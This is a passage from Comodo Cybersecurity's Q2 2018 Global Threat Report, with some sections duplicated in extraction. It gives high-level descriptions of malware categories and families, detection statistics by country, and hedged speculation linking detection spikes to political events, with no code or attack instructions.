Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
